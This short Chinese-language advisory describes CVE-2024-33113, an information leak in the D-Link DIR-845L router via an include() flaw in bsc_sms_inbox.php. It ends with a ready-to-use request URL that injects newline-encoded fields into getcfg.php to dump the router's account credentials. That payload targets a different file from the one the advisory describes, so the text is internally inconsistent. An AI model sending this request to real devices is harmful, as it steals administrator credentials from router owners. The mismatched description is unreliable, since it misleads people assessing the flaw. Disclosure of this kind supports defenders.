D-LINK DIR-845L 路由器通过 bsc_sms_inbox.php 文件存在信息泄露漏洞。
CVE-2024-33113 是 D-LINK DIR-845L 路由器中的一个漏洞,该漏洞通过 bsc_sms_inbox.php 文件导致信息泄露。该漏洞源于对 include() 函数的不当处理,攻击者可通过操控 $file 变量进行利用。这使得攻击者能够包含任意 PHP 脚本,并可能获取敏感信息,例如路由器的用户名和密码。
http://IP:8080/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
